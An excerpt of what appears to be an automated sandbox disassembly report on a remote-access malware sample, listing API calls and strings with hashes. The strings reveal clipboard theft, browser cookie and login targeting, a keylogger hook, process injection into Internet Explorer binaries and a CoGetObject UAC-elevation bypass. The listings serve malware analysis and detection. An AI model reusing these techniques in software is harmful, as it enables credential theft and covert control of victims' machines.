                                                        • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                        APIs
                                                        • OpenClipboard.USER32 ref: 004168FD
                                                        • EmptyClipboard.USER32 ref: 0041690B
                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                        • GlobalLock.KERNEL32 ref: 00416934
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                        • SetClipboardData.USER32 ref: 00416973
                                                        • CloseClipboard.USER32 ref: 00416990
                                                        • OpenClipboard.USER32 ref: 00416997
                                                        • GetClipboardData.USER32 ref: 004169A7
                                                        • GlobalLock.KERNEL32 ref: 004169B0
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                        • CloseClipboard.USER32 ref: 004169BF
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                        • String ID: !D@
                                                        • API String ID: 3520204547-604454484
                                                        • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                        • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                        • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                                        • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                        • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                        • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                        • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$Close$File$FirstNext
                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                        • API String ID: 3527384056-432212279
                                                        • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                        • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                        • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                                        • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 0041A04A
                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                        • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                        • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                        • API String ID: 489098229-1431523004
                                                        • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                        • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                        • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                        • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                        • API String ID: 3756808967-1743721670
                                                        • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                        • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                        • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                                        • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                        • API String ID: 0-1861860590
                                                        • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                        • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                        • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                        • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 0040755C
                                                        • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object_wcslen
                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                        • API String ID: 240030777-3166923314
                                                        • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                        • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                        • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                        • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                        APIs
                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                        • GetLastError.KERNEL32 ref: 0041A84C
                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                        • String ID:
                                                        • API String ID: 3587775597-0
                                                        • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                        • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                        • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                        • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                        • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                        • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                        • String ID: JD$JD$JD
                                                        • API String ID: 745075371-3517165026
                                                        • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                        • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                        • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                        • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                        • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                        • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFile$FirstNext
                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                        • API String ID: 1164774033-405221262
                                                        • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                        • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                        • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                        • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                        • String ID:
                                                        • API String ID: 2341273852-0
                                                        • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                        • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                        • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                        • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Find$CreateFirstNext
                                                        • String ID: 8SG$PXG$PXG$NG$PG
                                                        • API String ID: 341183262-3812160132
                                                        • Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                        • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                        • Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                        • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                        • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                        • GetLastError.KERNEL32 ref: 0040A328
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • GetMessageA.USER32 ref: 0040A376
                                                        • TranslateMessage.USER32(?), ref: 0040A385
                                                        • DispatchMessageA.USER32 ref: 0040A390
                                                        Strings
                                                        • Keylogger initialization failure: error , xrefs: 0040A33C
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                        • String ID: Keylogger initialization failure: error
                                                        • API String ID: 3219506041-952744263
                                                        • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                        • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                        • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                        • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                        • String ID:
                                                        • API String ID: 1888522110-0
                                                        • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                        • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                        • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                        • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                        APIs
                                                        • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                        • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                        • API String ID: 2127411465-314212984
                                                        • Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                        • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                        • Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                        • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                        APIs
                                                        • _free.LIBCMT ref: 00449292
                                                        • _free.LIBCMT ref: 004492B6
                                                        • _free.LIBCMT ref: 0044943D
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                        • _free.LIBCMT ref: 00449609
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                        • String ID:
                                                        • API String ID: 314583886-0
                                                        • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                        • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                        • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                        • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                        APIs
                                                          • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                          • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                          • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                          • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                          • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                        • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                        • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                        • API String ID: 1589313981-2876530381
                                                        • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                        • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                        • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                        • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                        APIs
                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                        • GetLastError.KERNEL32 ref: 0040BA93
                                                        Strings
                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                        • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                        • UserProfile, xrefs: 0040BA59
                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                        • API String ID: 2018770650-1062637481
                                                        • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                        • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                        • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                        • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                        • GetLastError.KERNEL32 ref: 004179D8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                        • String ID: SeShutdownPrivilege
                                                        • API String ID: 3534403312-3733053543
                                                        • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                        • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                        • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                        • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00409293
                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                        • FindClose.KERNEL32(00000000), ref: 004093FC
                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                        • FindClose.KERNEL32(00000000), ref: 004095F4
                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                        • String ID:
                                                        • API String ID: 1824512719-0
                                                        • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                        • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                        • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                        • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FSE$FSE$PkGNG
                                                        • API String ID: 0-1266307253
                                                        • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                        • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                        • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                        • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                        APIs
